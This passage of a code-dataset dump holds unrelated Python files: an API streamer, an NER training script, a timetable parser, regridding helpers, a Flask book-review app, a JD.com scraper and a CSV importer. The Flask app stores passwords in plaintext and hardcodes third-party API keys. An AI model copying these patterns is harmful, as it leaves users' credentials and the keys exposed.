that only allows you to get 50 records at a time and has\n    #no pagination trigger other than created_at date; as such if >50 records have the same created_at\n    #date you hit an infinite loop of requests; this breaks you out of that loop if it happens\n    if bookmark.get('endusers', None) == str(last_enduser_unixtime) and len(endusers) > 1:\n        logger.error('Breaking retrieval loop for endusers at unixtime ' + str(last_enduser_unixtime) + ', will cause missing data')\n        last_enduser_unixtime = last_enduser_unixtime + 1\n\n    if last_enduser_unixtime: #can be None if no new endusers\n        bookmark['endusers'] = str(last_enduser_unixtime)\n\ndef get_access_token(client_id, client_secret):\n    data = {\n        'grant_type': 'client_credentials',\n        'client_id': client_id,\n        'client_secret': client_secret\n    }\n    response = requests.post('https://api.wootric.com/oauth/token', data=data).json()\n    if 'access_token' in response:\n        return response['access_token']\n    raise Exception('Access Token Retrieval Failed: ' + str(response))\n\n\nif __name__ == '__main__':\n    configure_logging()\n    parser = argparse.ArgumentParser(prog='Wootric Streamer')\n    parser.add_argument('FILENAME', help='File containing the last bookmark value', nargs='?')\n    args = parser.parse_args()\n\n    client_id = get_env_or_throw('WOOTRIC_CLIENT_ID')\n    client_secret = get_env_or_throw('WOOTRIC_CLIENT_SECRET')\n    access_token = get_access_token(client_id, client_secret)\n    session.headers.update({'authorization': 'Bearer ' + access_token})\n\n    bookmark = {}\n    if args.FILENAME:\n        with open(args.FILENAME, 'r') as file:\n            for line in file:\n                bookmark = json.loads(line.strip())\n\n    if bookmark.get('endusers', None):\n        logger.info('Replicating endusers since %s', bookmark.get('endusers', None))\n    else:\n        logger.info('Replicating all endusers')\n    stitchstream.write_schema('endusers', enduser_schema)\n    get_all_new_endusers()\n\n    if bookmark.get('responses', None):\n        logger.info('Replicating responses since %s', bookmark.get('responses', None))\n    else:\n        logger.info('Replicating all responses')\n    stitchstream.write_schema('responses', response_schema)\n    get_all_new_responses()\n\n    if bookmark.get('declines', None):\n        logger.info('Replicating declines since %s', bookmark.get('declines', None))\n    else:\n        logger.info('Replicating all declines')\n    stitchstream.write_schema('declines', decline_schema)\n    get_all_new_declines()\n\n    stitchstream.write_bookmark(bookmark)\n","sub_path":"stream_wootric.py","file_name":"stream_wootric.py","file_ext":"py","file_size_in_byte":11659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"394234470","text":"import torch\r\nfrom flair.data import Corpus\r\nfrom flair.datasets import ColumnCorpus\r\nfrom flair.embeddings import TokenEmbeddings, WordEmbeddings, StackedEmbeddings, CharacterEmbeddings, FlairEmbeddings\r\nfrom typing import List\r\nfrom flair.trainers import ModelTrainer\r\n\r\ndef get_corpus_and_tagger():\r\n    columns = {0: 'text', 1: 'ner'}\r\n\r\n    data_folder = 'data/'\r\n\r\n    # init a corpus using column format, data folder and the names of the train, dev and test files\r\n    corpus: Corpus = ColumnCorpus(data_folder, columns,\r\n                                  train_file='train_IOB_Format_file.txt',\r\n                                  test_file='train_IOB_Format_file.txt',\r\n                                  dev_file=\"dev_IOB_format_file.txt\")\r\n\r\n    tag_type = 'ner'\r\n\r\n    # 3. 
make the tag dictionary from the corpus\r\n tag_dictionary = corpus.make_tag_dictionary(tag_type=tag_type)\r\n\r\n embedding_types: List[TokenEmbeddings] = [\r\n\r\n WordEmbeddings('glove'),\r\n\r\n # comment in this line to use character embeddings\r\n # CharacterEmbeddings(),\r\n\r\n # comment in these lines to use flair embeddings.\r\n FlairEmbeddings('news-forward'),\r\n FlairEmbeddings('news-backward'),\r\n ]\r\n\r\n embeddings: StackedEmbeddings = StackedEmbeddings(embeddings=embedding_types)\r\n\r\n # 5. initialize sequence tagger\r\n from flair.models import SequenceTagger\r\n\r\n tagger: SequenceTagger = SequenceTagger(hidden_size=256,\r\n embeddings=embeddings,\r\n tag_dictionary=tag_dictionary,\r\n tag_type=tag_type,\r\n use_crf=True)\r\n\r\n return corpus, tagger\r\n\r\n\r\ndef train_model(corpus, tagger):\r\n trainer: ModelTrainer = ModelTrainer(tagger, corpus)\r\n\r\n # 7. start training\r\n trainer.train('models/',\r\n learning_rate=0.1,\r\n mini_batch_size=16,\r\n max_epochs=20)\r\n\r\n\r\nif __name__ == '__main__':\r\n corpus, tagger = get_corpus_and_tagger()\r\n train_model(corpus, tagger)\r\n","sub_path":"src/train_flair_model.py","file_name":"train_flair_model.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"36873191","text":"import urllib.request\nfrom icalendar import Calendar, Event\nfrom datetime import datetime, timezone, timedelta\nfrom pytz import UTC # timezone\nimport pprint\nfrom operator import attrgetter\n\n\npprint = pprint.pprint\n\n\n\nclass Event:\n module = None\n type = None\n room = None\n date = None\n end = None\n Ftime = None\n\nclass Timetable:\n @staticmethod\n def TDecode(url):\n \"\"\"Creates a list of event objects based on a ical url\"\"\"\n if url is None:\n return None # Nob hasnt given us their timetable yet\n rawCal = urllib.request.urlopen(url) # Try and download the timetable's ical\n cal = Calendar.from_ical(rawCal.read()) # Parse the ical\n events = [] # create a list of events\n\n for component in cal.walk(): # for \"thing\" in the cal\n if component.name == \"VEVENT\": # if its an event\n description = component.get('description').split(\"\\n\") # get all its information\n location = component.get('location') # unused location data because description has it more reliably\n startdt = component.get('dtstart').dt # start date/time\n enddt = component.get('dtend').dt # end date/time\n\n module = \"Undefined\"\n room = \"Undefined\"\n type = \"Undefined\"\n\n for item in description:\n item = str(item)\n if \"MODULE TITLE:\" in item: # get the modules name\n module = item.replace(\"MODULE TITLE: \", \"\")\n if \"ROOM(S):\" in item: # get the room name\n room = item.replace(\"ROOM(S): \", \"\")\n if \"EVENT TYPE:\" in item: # is it a lecture? workshop? 
seminar?\n type = item.replace(\"EVENT TYPE: \", \"\")\n date = \"{:02d}/{:02d}\".format(startdt.day, startdt.month)\n timeFormatted = \"{Date}-{hour:02d}:{minute:02d}\".format(Date=date, hour=startdt.hour+1,\n minute=startdt.minute)\n endFormatted = \"{hour:02d}:{minute:02d}\".format(hour=enddt.hour+1, minute=enddt.minute)\n event = Event() # create an event object\n event.module = module\n event.Ftime = timeFormatted\n event.date = startdt\n event.end = endFormatted\n event.type = type\n event.room = room\n if len(events) != 0: # put the event, in order, in the list of events\n for i in range(len(events)):\n if event.date < events[i].date:\n events.insert(i, event)\n break\n if i == len(events)-1:\n events.append(event)\n else:\n events.append(event)\n return events\n\n @staticmethod\n def next7(events):\n \"\"\"Outputs a nicely formatted human readable piece of html code for email\"\"\"\n if events is None: # nob didnt share their timetable\n return \"Your target has chosen not to share their timetable, sorry\"\n text = \"\" # the string to be outputted\n lastDate = None # the last date processed, used to split days with ==========\n for event in events:\n if datetime.now(timezone.utc) <= event.date <= (datetime.now(timezone.utc) + timedelta(days=8)): # grab the next 7days of timetables (7+1 because datetime is weird)\n # sexy formatting\n TempText = (\"||{t}->{e} || {type:<9} || {r:<7} ||
    \".format(t=event.Ftime, e=event.end, type=event.type.lower().capitalize() , r=event.room))\n TempDate = TempText[:5] # get the date of the event\n if TempDate != lastDate: # if the last event and this event are on different days\n text += \"=\"*len(TempText.replace(\"
    \", \"\")) + \"
    \" # split them with ======\n lastDate = TempDate\n text += TempText # add the nicely formatted string\n\n return text","sub_path":"backend/timetable.py","file_name":"timetable.py","file_ext":"py","file_size_in_byte":4148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"263934343","text":"def regrid_2d(data_array,Nx,Ny):\n \"\"\"\n This function loads a two-dimensional numpy array and interpolates it to a new grid array with \n defined sizes using nearest neighbour interpolation. \n Inputs:\n *data_array: input array.\n *Nx: resolution of output array in x-direction.\n *Ny: resolution of output array in y-direction.\n Outputs:\n *data_array_new: output array.\n \n created by Daniel Haenelt\n Date created: 07-01-2019 \n Last modified: 09-01-2019\n \"\"\"\n import numpy as np\n from scipy.interpolate import griddata\n\n # size of input array\n data_size = np.shape(data_array)\n\n # grid of input array\n x = np.arange(0,data_size[0])\n y = np.arange(0,data_size[1])\n xgrid, ygrid = np.meshgrid(x,y)\n xgrid = np.reshape(xgrid,np.size(xgrid))\n ygrid = np.reshape(ygrid,np.size(ygrid))\n xi_old = np.stack((xgrid,ygrid),1)\n\n # grid of output array\n x_new = np.linspace(0,data_size[0],Nx)\n y_new = np.linspace(0,data_size[1],Ny)\n xgrid_new, ygrid_new = np.meshgrid(x_new,y_new)\n xgrid_new = np.reshape(xgrid_new,np.size(xgrid_new))\n ygrid_new = np.reshape(ygrid_new,np.size(ygrid_new))\n #xi_new = np.floor(np.stack((xgrid_new,ygrid_new),1))\n xi_new = np.stack((xgrid_new,ygrid_new),1)\n\n # values of input array\n data_array = np.reshape(data_array,np.size(data_array))\n\n # grid values from old grid to new grid\n data_array_new = griddata(xi_old, data_array, xi_new, method='nearest')\n data_array_new = np.reshape(data_array_new,(Nx,Ny))\n \n return data_array_new\n\n\ndef regrid_1d(data_array,N):\n \"\"\"\n This function loads a one-dimensional numpy array and interpolates it to a new grid array with \n defined sizes using nearest neighbour interpolation. 
\n Inputs:\n *data_array: input array.\n *N: resolution of output array.\n Outputs:\n *data_array_new: array values interpolated to new grid.\n \n created by Daniel Haenelt\n Date created: 08-01-2019 \n Last modified: 09-01-2019\n \"\"\"\n import numpy as np\n from scipy.interpolate import griddata\n\n # size of input array\n data_size = np.shape(data_array)\n\n # grid of input array\n xi_old = np.arange(0,data_size[0])\n\n # grid of output array\n #xi_new = np.floor(np.linspace(0,data_size[0],N))\n xi_new = np.linspace(0,data_size[0],N)\n\n # grid values from old grid to new grid\n data_array_new = griddata(xi_old, data_array, xi_new, method='nearest')\n \n return data_array_new\n","sub_path":"lib/simulation/regrid.py","file_name":"regrid.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"150014924","text":"import os\n\nfrom flask import Flask, session, render_template, request, redirect, url_for, abort, jsonify\nfrom flask_session import Session\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nimport requests\n\napp = Flask(__name__)\n\n# Check for environment variable\nif not os.getenv(\"DATABASE_URL\"):\n raise RuntimeError(\"DATABASE_URL is not set\")\n\n# Configure session to use filesystem\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n# Set up database\nengine = create_engine(os.getenv(\"DATABASE_URL\"))\ndb = scoped_session(sessionmaker(bind=engine))\n\n\n@app.route(\"/\")\ndef index():\n\tif \"user\" in session:\n\t\treturn redirect(url_for('login'))\n\treturn render_template('index.html')\n\n@app.route(\"/registration\", methods=['POST'])\ndef register():\n\t\"\"\"Fetching all the Inputs\"\"\"\n\tinputusername = request.form.get('inputusername')\n\tinputemail = request.form.get('inputemail')\n\tinputpassword = request.form.get('inputpassword')\n\n\t\"\"\"Handing Username Section\"\"\"\n\tuser_exist = db.execute('SELECT * FROM users WHERE username = :inputusername',{'inputusername':inputusername}).fetchone()\n\tif not(user_exist is None):\n\t\treturn render_template('index.html', issue=\"Username Already Exists!\", result=\"unsuccess\")\n\n\t\"\"\"Handling Email Section\"\"\"\n\temail_exist = db.execute('SELECT * FROM users WHERE email = :inputemail',{'inputemail':inputemail}).fetchone()\n\tif not(email_exist is None):\n\t\treturn render_template('index.html', issue=\"Email Already Exists! 
Just Login Below\", result=\"unsuccess\")\n\telse:\n\t\treq = requests.get('https://app.verify-email.org/api/v1/UpNGc6mUVeKLPL8d2wR66dRI60Xz27Q0eJlchtqzKAO1ffil8g/verify/{}'.format(inputemail))\n\t\tresult = req.json()\n\t\tif result['status']!=1: #If equal to 1 it's mean that Email is ok/exists\n\t\t\treturn render_template(\"index.html\", issue='Invalid Email Address!', result=\"unsuccess\")\n\n\t\"\"\"Inserting data into the Database\"\"\"\n\tdb.execute(\"INSERT INTO users (username, email, password) VALUES (:inputusername, :inputemail, :inputpassword)\",{\n\t\t'inputusername':inputusername, 'inputemail': inputemail, 'inputpassword':inputpassword\n\t\t})\n\tdb.commit()\n\treturn render_template('index.html', issue=\"Registered Successfully!\", result='success')\n\n@app.route(\"/login\", methods=['POST', 'GET'])\ndef login():\n\tif request.method=='POST':\n\t\t\"\"\"Fetching all the Inputs\"\"\"\n\t\tloginusername = request.form.get('loginusername')\n\t\tloginpassword = request.form.get('loginpassword')\n\n\t\t\"\"\"Checking User Exists or Not\"\"\"\n\t\trecord_exist = db.execute('SELECT * FROM users WHERE username = :loginusername AND password = :loginpassword', {'loginusername':loginusername, 'loginpassword': loginpassword}).fetchone()\n\t\tif record_exist is None:\n\t\t\t#return \"Invalid Username/Password!\"\n\t\t\treturn render_template('index.html', issue='Invalid Username/Password!', result='unsuccess')\n\n\t\t\"\"\"Storing current logged in user into the session\"\"\"\n\t\tsession[\"user\"] = []\n\t\tsession[\"user\"].append(record_exist.id)\n\t\tsession[\"user\"].append(record_exist.username)\n\t\treturn render_template('search.html', user=session['user'])\n\n\telse:\n\t\tif 'user' in session:\n\t\t\treturn render_template('search.html', user=session['user'])\n\t\treturn redirect(url_for('index'))\n\n@app.route('/logout')\ndef logout():\n\tsession.pop('user')\n\treturn redirect(url_for('index'))\n\n@app.route('/search', methods=['POST','GET'])\ndef search():\n\tif request.method=='POST':\n\t\t\"\"\"Fetching all the Inputs\"\"\"\n\t\tisbn = request.form.get('isbn')\n\t\ttitle = request.form.get('title')\n\t\tauthor = request.form.get('author')\n\t\t#info = db.execute(\"SELECT * FROM books WHERE author = :author\",{'author':author}).fetchall()\n\n\t\tif request.args.get(\"f\") == 'f1':\n\t\t\tdata = db.execute(\"SELECT * FROM books WHERE isbn = :isbn\",{'isbn':isbn}).fetchall()\n\n\t\telif request.args.get(\"f\") == 'f2':\n\t\t\tdata = db.execute(\"SELECT * FROM books WHERE title = :title\",{'title':title}).fetchall()\n\n\t\telif request.args.get(\"f\") == 'f3':\n\t\t\tdata = db.execute(\"SELECT * FROM books WHERE author = :author\",{'author':author}).fetchall()\n\n\t\telif request.args.get(\"f\") == 'f4':\n\t\t\tif (author is not None and title is not None and author is not None):\n\t\t\t\tdata = db.execute(\"SELECT * FROM books WHERE (title = :title AND isbn = :isbn) AND (author = :author)\",{'title':title, 'isbn':isbn,'author':author}).fetchall()\n\t\t\telse:\n\t\t\t\tdata = 'incomplete'\n\n\t\treturn render_template('searched.html', data=data)\n\n\telse:\n\t\treturn redirect(url_for('login'))\n\n@app.route('/book/', methods=['GET', 'POST'])\ndef book(no):\n\tif 'user' not in session:\n\t\t\treturn redirect(url_for('login'))\n\n\tif request.method=='GET':\n\n\t\t\"\"\"Collecting only 1 book data whose id is no\"\"\"\n\t\tbook = db.execute(\"SELECT * FROM books WHERE id = :id\",{'id':no}).fetchone()\n\n\t\t\"\"\"Checking if enter book is valid or not\"\"\"\n\t\tif book is 
None:\n\t\t\treturn render_template('error.html', error = 'Entered Id is Incorrect!')\n\n\t\t\"\"\"Checking if user has already reviewed it or not\"\"\"\n\t\treviewed = db.execute(\"SELECT * FROM reviews WHERE users_id = :users_id AND books_id = :books_id\",{'users_id': session['user'][0], 'books_id': no}).fetchone()\n\t\tif reviewed is None:\n\t\t\tflag = True\n\t\telse:\n\t\t\tflag = False\n\n\t\t\"\"\"Taking another people reviews to display on page\"\"\"\n\t\treviews = db.execute(\"SELECT username, rating, review FROM reviews JOIN users ON users.id = reviews.users_id WHERE books_id = :books_id\", {'books_id': no}).fetchall()\n\n\t\t\"\"\"Using API to get Goodreads Reviews\"\"\"\n\t\tres = requests.get(\"https://www.goodreads.com/book/review_counts.json\", params={\"key\": \"am79tEwwV9gqV6uXm5SA\", \"isbns\": book.isbn})\n\t\tdic = res.json()\n\n\t\t\"\"\"0 index showing average_rating, 1 shows reviews count\"\"\"\n\t\tgoodratings = [dic['books'][0]['average_rating'], dic['books'][0]['ratings_count']]\n\n\t\treturn render_template('book.html', book=book, flag=flag, reviews=reviews, goodratings=goodratings)\n\t\t\n\n\telse:\n\t\trating = request.form.get('rating')\n\t\tif rating is None:\n\t\t\trating = 1\n\t\treview = request.form.get('review')\n\t\tdb.execute(\"INSERT INTO reviews (users_id, books_id, rating, review) VALUES (:users_id, :books_id, :rating, :review)\", {'users_id': session['user'][0], 'books_id': no, 'rating' : int(rating), 'review': review})\n\t\tdb.commit()\n\t\treturn redirect(url_for('book', no=no))\n\n\n@app.route('/api/')\ndef api(isbn):\n\n\t\"\"\"Fetching Book\"\"\"\n\tbook = db.execute(\"SELECT * FROM books WHERE isbn = :isbn\", {'isbn':isbn}).fetchone()\n\n\t\"\"\"Checking if book is Available or Not\"\"\"\n\tif book is None:\n\t\treturn abort(404)\n\n\t\"\"\"Calculating review counts and average score\"\"\"\n\tcal = db.execute(\"SELECT COUNT(*), AVG(rating) FROM reviews WHERE books_id = :books_id\", {'books_id': book.id}).fetchall()\n\n\ttry:\n\t\treturn jsonify({\n\t\t\t\"title\": book.title,\n\t \t\"author\": book.author,\n\t \t\"year\": book.year,\n\t \t\"isbn\": book.isbn,\n\t \t\"review_count\": cal[0].count,\n\t \t\"average_score\": float(cal[0].avg)\n\t\t\t})\n\texcept Exception:\n\t\treturn jsonify({\n\t\t\t\"title\": book.title,\n\t \t\"author\": book.author,\n\t \t\"year\": book.year,\n\t \t\"isbn\": book.isbn,\n\t \t\"review_count\": cal[0].count,\n\t \t\"average_score\": 0\n\t\t\t})\n\n\n\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":7070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"152775255","text":"import torch.nn as nn\nfrom .t2t_vit import T2t_vit_t_14\nfrom .Transformer import Transformer\nfrom .Transformer import token_Transformer\nfrom .Decoder import Decoder\n\n\nclass ImageDepthNet(nn.Module):\n def __init__(self, args):\n super(ImageDepthNet, self).__init__()\n\n # VST Encoder\n self.rgb_backbone = T2t_vit_t_14(pretrained=False, args=args)\n\n # VST Convertor\n self.transformer = Transformer(embed_dim=384, depth=4, num_heads=6, mlp_ratio=3.)\n\n # VST Decoder\n self.token_trans = token_Transformer(embed_dim=384, depth=4, num_heads=6, mlp_ratio=3.)\n self.decoder = Decoder(embed_dim=384, token_dim=64, depth=2, img_size=args.img_size)\n\n def forward(self, image_Input):\n\n B, _, _, _ = image_Input.shape\n # VST Encoder\n rgb_fea_1_16, rgb_fea_1_8, rgb_fea_1_4 = self.rgb_backbone(image_Input)\n\n # VST Convertor\n rgb_fea_1_16 = 
self.transformer(rgb_fea_1_16)\n        # rgb_fea_1_16 [B, 14*14, 384]\n\n        # VST Decoder\n        saliency_fea_1_16, fea_1_16, saliency_tokens, contour_fea_1_16, contour_tokens = self.token_trans(rgb_fea_1_16)\n        # saliency_fea_1_16 [B, 14*14, 384]\n        # fea_1_16 [B, 1 + 14*14 + 1, 384]\n        # saliency_tokens [B, 1, 384]\n        # contour_fea_1_16 [B, 14*14, 384]\n        # contour_tokens [B, 1, 384]\n\n        outputs = self.decoder(saliency_fea_1_16, fea_1_16, saliency_tokens, contour_fea_1_16, contour_tokens, rgb_fea_1_8, rgb_fea_1_4)\n\n        return outputs\n","sub_path":"python/NCKU_LAB_Paper/VST/RGB_VST/Models/ImageDepthNet.py","file_name":"ImageDepthNet.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"274312331","text":"countMayor, countMenor, c = 0, 0, True\r\nwhile (c == True):\r\n    numero = int(input(\"Enter an integer; enter 100 to end the program: \"))\r\n    if numero > 100:\r\n        countMayor += 1\r\n    elif numero < 100:\r\n        countMenor += 1\r\n    elif numero == 100:\r\n        c = False\r\nprint(\"The count of numbers greater than 100 was: {0} \\nThe count of numbers less than 100 was: {1}\".format(countMayor,countMenor))","sub_path":"Talleres/Taller30Abril/Punto53.py","file_name":"Punto53.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"503317413","text":"# Every even number greater than 2 can be expressed as the sum of two primes. => Goldbach's conjecture\r\n\r\nimport math\r\n\r\ndef get_primes(limit):\r\n    prime_board = [False] * (limit + 1)\r\n    prime_board[0] = True\r\n    prime_board[1] = True\r\n    result = []\r\n\r\n    for i in range(2, int(math.sqrt(limit)) + 1):\r\n        if prime_board[i] is False:\r\n            for j in range(i * 2, limit + 1, i):\r\n                prime_board[j] = True\r\n\r\n    for i in range(2, limit+1):\r\n        if prime_board[i] is False:\r\n            result.append(i)\r\n\r\n    return result\r\n\r\n\r\ndef get_goldbach(n):\r\n    board = get_primes(n)\r\n    len_board = len(board)\r\n    smaller = 0\r\n    bigger = 0\r\n\r\n    mid = n >> 1\r\n    i = j = mid\r\n\r\n    while i > 1:\r\n        if i in board and j in board:\r\n            return str(i)+\" \"+str(j)\r\n        i -= 1\r\n        j += 1\r\n\r\n\r\ndef main():\r\n    inputs = []\r\n\r\n    T = int(input())\r\n    for t in range(T):\r\n        temp_input = int(input())\r\n        if (temp_input % 2 == 0) and (temp_input in range(4, 10001)):\r\n            inputs.append(temp_input)\r\n        else:\r\n            return\r\n\r\n    for each in inputs:\r\n        print(get_goldbach(each))\r\n\r\nmain()\r\n","sub_path":"BAEJOON/9020_골드바흐의_추측.py","file_name":"9020_골드바흐의_추측.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"532798017","text":"import sys\n\ndef compute(l, w, h):\n    extra = min([l*w, w*h, h*l])\n    return 2*l*w + 2*w*h + 2*h*l + extra\n\n\nt = 0\nwith open('./data', 'r') as _in:\n    for box in _in:\n        t += compute(*[int(x) for x in box.split('x')])\nassert t == 1588178\n","sub_path":"2015/day2/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"110098293","text":"from django.contrib.auth import logout\r\nfrom django.http import HttpResponse\r\nfrom django.http import HttpResponseRedirect\r\nfrom django.shortcuts import render, redirect\r\nfrom django.urls import reverse\r\n\r\nfrom korona.utils import create_spreadsheet_data\r\nfrom .models import Question, History\r\n\r\ndef update_session(request):\r\n    url_list = 
request.session.get('urls_history')\r\n    if url_list is None:\r\n        request.session['urls_history'] = request.path\r\n    else:\r\n        url_list.append(request.path)\r\n        request.session['urls_history'] = url_list\r\n\r\ndef question_view(request, pk=None):\r\n    if not request.user.is_authenticated:\r\n        return HttpResponseRedirect(reverse('home'))\r\n    else:\r\n        # request.session['urls_history'].append(request.path)\r\n\r\n\r\n        history_instance = History.objects.all().filter(assigned_user=request.user).order_by('-id')[0]\r\n        questions_history = history_instance.questions_all\r\n        answers_history = history_instance.answers_all\r\n        # print(request.user.is_authenticated)\r\n        question = Question.objects.filter(pk=pk).first()\r\n        # print(question.choice_set.all())\r\n        numerical = False\r\n        if len(list(question.choice_set.all())) == 0:\r\n            numerical = True\r\n        context = {'question': question,\r\n                   'numerical': numerical,\r\n                   'code': request.user.username}\r\n\r\n        questions_history = f'{questions_history}||{question.question_text}'\r\n        if request.method == 'POST':\r\n            update_session(request)\r\n\r\n            if numerical:\r\n                value = request.POST.get('value')\r\n                answers_history = f'{answers_history}||{value}'\r\n                history_instance.questions_all = questions_history\r\n                history_instance.answers_all = answers_history\r\n                history_instance.save()\r\n                if question.next_question is None:\r\n                    # return HttpResponseRedirect(reverse('polls:final'))\r\n                    logout(request)\r\n                    return render(request, 'final.html', context)\r\n                else:\r\n                    next_question_id = question.next_question.id\r\n                    # return HttpResponseRedirect(reverse('polls:question-detail', args=(next_question_id,)))\r\n                    return redirect(reverse('polls:question-detail', args=(next_question_id,)))\r\n            else:\r\n                selected_choice = question.choice_set.get(pk=request.POST.get('choice'))\r\n                answers_history = f'{answers_history}||{selected_choice.choice_text}'\r\n                history_instance.questions_all = questions_history\r\n                history_instance.answers_all = answers_history\r\n                history_instance.save()\r\n                if not (selected_choice.final):\r\n                    if len(list(selected_choice.choiceorder_set.all().values())) > 0:\r\n                        next_question_id = list(selected_choice.choiceorder_set.all().values())[0]['question_id']\r\n                        # return HttpResponseRedirect(reverse('polls:question-detail', args=(next_question_id,)))\r\n                        return redirect(reverse('polls:question-detail', args=(next_question_id,)))\r\n                    else:\r\n                        logout(request)\r\n                        # return HttpResponseRedirect(reverse('polls:final'))\r\n                        return render(request, 'final.html', context)\r\n\r\n        return render(request, 'question_detail.html', context)\r\n\r\n\r\ndef output_view(request):\r\n    context = {}\r\n    if request.method == 'POST':\r\n        code = request.POST.get('code')\r\n        data = create_spreadsheet_data(code=code)\r\n\r\n        if data is not None:\r\n            response = HttpResponse(data,\r\n                                    content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\r\n            response['Content-Disposition'] = 'attachment; filename=\"output' + code + '.xlsx\"'\r\n            return response\r\n        else:\r\n            context['message'] = 'No data assigned to the given code'\r\n    return render(request, 'output.html', context)\r\n\r\n\r\ndef intro_view(request):\r\n    request.session['urls_history'] = [request.path]\r\n    context = {}\r\n    context['code'] = request.user.username\r\n    if request.method == 'POST':\r\n        return HttpResponseRedirect(reverse('polls:question-detail', args=(3,)))\r\n    else:\r\n        return render(request, 'intro.html', context)\r\n\r\n\r\ndef return_view(request):\r\n    urls = 
request.session['urls_history']\r\n prev_url = urls[-1]\r\n if 'intro' in prev_url.split('/')[-1]:\r\n return redirect(request.META.get('HTTP_REFERER'))\r\n\r\n history_instance = History.objects.all().filter(assigned_user=request.user).order_by('-id')[0]\r\n history_instance.answers_all = '||'.join(history_instance.answers_all.split('||')[:-1])\r\n history_instance.questions_all = '||'.join(history_instance.questions_all.split('||')[:-1])\r\n history_instance.save()\r\n urls = request.session['urls_history']\r\n prev_url = urls[-1]\r\n request.session['urls_history'] = urls[:-1]\r\n return redirect(prev_url)","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"369769991","text":"def monotonic_array(arr):\n # find if negative or positive\n # -1, -10, -11, -12, -15\n if len(arr) <= 2: return True\n \n i = 0\n direction = 0\n while i < len(arr)-1:\n mono = arr[i] - arr[i+1]\n if mono != 0:\n if arr[i+1] > arr[i]:\n direction = 1\n break\n else:\n direction = -1\n break\n i += 1\n \n if direction == 0: return True\n \n while i < len(arr) - 1:\n if not same_direction(arr[i], arr[i+1], direction):\n return False\n i += 1\n return True\n\ndef same_direction(one, two, direction):\n if two > one and direction < 0:\n return False\n elif two < one and direction > 0:\n return False\n return True\n \n\nif __name__ == \"__main__\":\n print(monotonic_array([5,7,6]))","sub_path":"algoexpert/arrays/monotonic.py","file_name":"monotonic.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"532034631","text":"# -*- coding: utf-8 -*-\nimport re\nimport requests\nimport time\n\n\ndef parse_Answer(q_id):\n i = 1\n out = open(\"./Output/Answer.txt\", \"a\")\n while True:\n with requests.session() as MySession:\n url = 'http://question.jd.com/question/getAnswerListById.action'\n data = {\n 'questionId':'%s' %q_id,\n 'page':i\n }\n data = MySession.get(url, params = data).text\n if data:\n lines = re.findall('\"content\":\"(.*?)\"', data)\n if lines:\n for line in lines:\n print(line)\n out.write(line)\n out.write(\"\\n\")\n else:\n print('--------------Parse Question Finished--------------')\n out.close()\n break\n else:\n print('--------------Parse Question Error--------------')\n out.close()\n break\n i = i + 1\n time.sleep(5)\n\ndef parse_Product(p_id):\n i = 1\n out = open(\"./Output/Question.txt\", \"a\")\n while True:\n with requests.session() as MySession:\n url = 'http://question.jd.com/question/getQuestionAnswerList.action'\n API = {\n 'productId':'%s' %p_id,\n 'page':i\n }\n data = MySession.get(url, params = API).text\n if data:\n lines = re.findall(r'\"id\":(\\d+),\"content\":\"(.*?)\"', data)\n loop = 1\n if lines:\n for QID,Question in lines:\n print(Question)\n out.write(Question)\n out.write(\"\\n\")\n parse_Answer(QID)\n loop = loop + 1\n else:\n print('--------------Parsing Product Finished--------------')\n out.close()\n break\n\n else:\n print('--------------Parsing Product Error--------------')\n out.close()\n break\n i = i + 1\n time.sleep(5)\n\ndef run():\n with open(\"./PID/PID_babycare.json\") as f:\n for line in f:\n try:\n pid = re.findall(r'\"PID\": \"(.*?)\"', line)[0]\n parse_Product(pid)\n except IndexError:\n pass\n\nif __name__ == '__main__':\n 
run()","sub_path":"Conversation/spiders/conversation_request.py","file_name":"conversation_request.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"130056740","text":"import csv\nfrom mygate.models import FoodTruckData\nfrom datetime import datetime\n\n\ndef populate():\n remarks_file = open('Mobile_Food_Facility_Permit.csv','r')\n csv_reader = csv.reader(remarks_file, dialect='excel')\n csv_reader.next()\n datas = []\n for row in csv_reader:\n try:\n apr = datetime.strptime(row[19], \"%m/%d/%Y %I:%M:%S %p\")\n except:\n apr = None\n try:\n rec = datetime.strptime(row[20], \"%Y-%M-%d\")\n except:\n rec = None\n try:\n exp = datetime.strptime(row[22], \"%m/%d/%Y %I:%M:%S %p\")\n except:\n exp = None\n datas.append(FoodTruckData(location_id = row[0], name = row[1], street = row[5], status=row[10], received=rec, permit=row[9], facility_type=row[2], approval_time=apr, expiry_time=exp))\n # FoodTruckData.objects.create(location_id = row[0], name = row[1], street = row[5], status=row[10], received=rec, permit=row[9], facility_type=row[2], approval_time=apr, expiry_time=exp)\n FoodTruckData.objects.bulk_create(datas, 